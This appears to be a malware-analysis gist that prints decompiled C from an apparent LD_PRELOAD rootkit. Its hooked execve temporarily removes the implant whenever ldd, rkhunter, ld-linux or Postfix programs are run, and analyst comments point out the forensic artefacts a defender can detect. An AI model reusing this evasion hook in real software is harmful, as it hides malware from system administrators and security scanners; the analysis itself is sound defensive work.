@darrenmartyn
Created November 25, 2021 14:34
/*
 * Decompiler output (generated names such as pcVar1 / iVar4 / local_c) for a
 * function exported under the name execve. It resolves another "execve" with
 * dlsym() and caches it in old_execve, which is consistent with a preloaded
 * interposer sitting in front of the libc wrapper.
 *
 * Three outcomes, selected by substring matches on __path:
 *   1. __path contains "ldd", "rkhunter" or "ld-linux", or the calling
 *      process has LD_TRACE_LOADED_OBJECTS in its environment:
 *      mdma_uninstall(), run the target in a fork()ed child, waitpid() for
 *      it, mdma_install(), exit(0).
 *   2. __path contains one of the listed names (they match Postfix daemon and
 *      helper program names): same uninstall/fork/exec sequence, but the
 *      parent sleeps 5 seconds instead of waiting, then mdma_install() and
 *      exit(0).
 *   3. Anything else: direct call through to the resolved execve.
 *
 * mdma_install() / mdma_uninstall() are not shown on this page; presumably
 * they add and remove the implant's hook while the inspected program runs --
 * confirm against the binary.
 *
 * Defender notes, each visible in the code below:
 *   - In cases 1 and 2 the target does not replace the calling process; it
 *     runs in a new child, so PID and process lineage differ from a normal
 *     exec of the same command.
 *   - The calling process always ends with exit(0); the child's status
 *     collected in local_c is never propagated, so the launcher sees success
 *     regardless of what the target returned.
 *   - Matching is strstr() over the whole path, so unrelated paths that only
 *     contain "local", "pipe", "error", "master", "verify", ... also take
 *     case 2 and show the same fork / 5-second delay / exit(0) pattern.
 *   - The environment test uses getenv(), i.e. the caller's own environment,
 *     not the __envp array passed to this call.
 */
int execve(char *__path,char **__argv,char **__envp)
{
char *pcVar1;
char *pcVar2;
__pid_t _Var3;
int iVar4;
int local_c;
/* Non-NULL when the dynamic loader's "list dependencies" mode is requested
   in this process's environment; evaluated later together with "ld-linux". */
pcVar1 = getenv("LD_TRACE_LOADED_OBJECTS");
/* Lazy one-time lookup of the underlying execve. 0xffffffff is how the
   decompiler renders the handle argument; it would equal RTLD_NEXT
   ((void *)-1) on a 32-bit glibc build -- TODO confirm for this sample. */
if (old_execve == (code *)0x0) {
old_execve = (code *)dlsym(0xffffffff,"execve");
}
/* Inspection-tool checks. A match on any of these (or the environment
   variable above) skips the whole nested block and falls through to the
   uninstall / fork / waitpid path at the bottom of the function. */
pcVar2 = strstr(__path,"ldd");
if (pcVar2 == (char *)0x0) {
pcVar2 = strstr(__path,"rkhunter");
if (pcVar2 == (char *)0x0) {
pcVar2 = strstr(__path,"ld-linux");
if ((pcVar2 == (char *)0x0) && (pcVar1 == (char *)0x0)) {
/* Second name list. pcVar1 is reused as the strstr() result from here on.
   Each nested "if" continues only while no name has matched yet; the first
   match drops out of the nest to the uninstall / fork / sleep path below. */
pcVar1 = strstr(__path,"postmulti-script");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"showq");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"tlsproxy");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"pickup");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"pipe");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"qmqpd");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"postfix-script");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"spawn");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"dnsblog");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"smtp");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"proxymap");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"lmtp");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"tlsmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"verify");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"nqmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"discard");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"post-install");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"master");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"oqmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"cleanup");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"trivial-rewrite");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"virtual");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"qmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"local");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"postscreen");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"bounce");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"anvil");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,
"postfix-wrapper");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"flush");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"smtpd");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"error");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"scache");
if (pcVar1 == (char *)0x0) {
/* Case 3: no name matched anywhere -- transparent pass-through. This is the
   only path on which the caller gets ordinary execve semantics. */
iVar4 = (*old_execve)(__path,__argv,
__envp);
return iVar4;
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
/* Case 2: a name from the second list matched. The hook is removed, the
   target runs in a child, and the parent restores the hook after a fixed
   5-second delay without waiting for the child to finish. */
mdma_uninstall();
_Var3 = fork();
if (_Var3 == -1) {
/* fork() failed: the process exits 1 and mdma_install() is not called on
   this path. */
/* WARNING: Subroutine does not return */
exit(1);
}
if (_Var3 == 0) {
/* Child: exit(0) is reached only if the exec call returns, i.e. failed. */
(*old_execve)(__path,__argv,__envp);
/* WARNING: Subroutine does not return */
exit(0);
}
sleep(5);
mdma_install();
/* Parent exits 0 unconditionally; the child may still be running. */
/* WARNING: Subroutine does not return */
exit(0);
}
}
}
/* Case 1: "ldd", "rkhunter" or "ld-linux" in the path, or
   LD_TRACE_LOADED_OBJECTS set. Same sequence as case 2, except the parent
   blocks in waitpid() until the child ends before calling mdma_install(). */
mdma_uninstall();
_Var3 = fork();
if (_Var3 == -1) {
/* fork() failed: the process exits 1 and mdma_install() is not called on
   this path. */
/* WARNING: Subroutine does not return */
exit(1);
}
if (_Var3 == 0) {
/* Child: exit(0) is reached only if the exec call returns, i.e. failed. */
(*old_execve)(__path,__argv,__envp);
/* WARNING: Subroutine does not return */
exit(0);
}
/* The child's status lands in local_c but is never read afterwards. */
waitpid(_Var3,&local_c,0);
mdma_install();
/* WARNING: Subroutine does not return */
exit(0);
}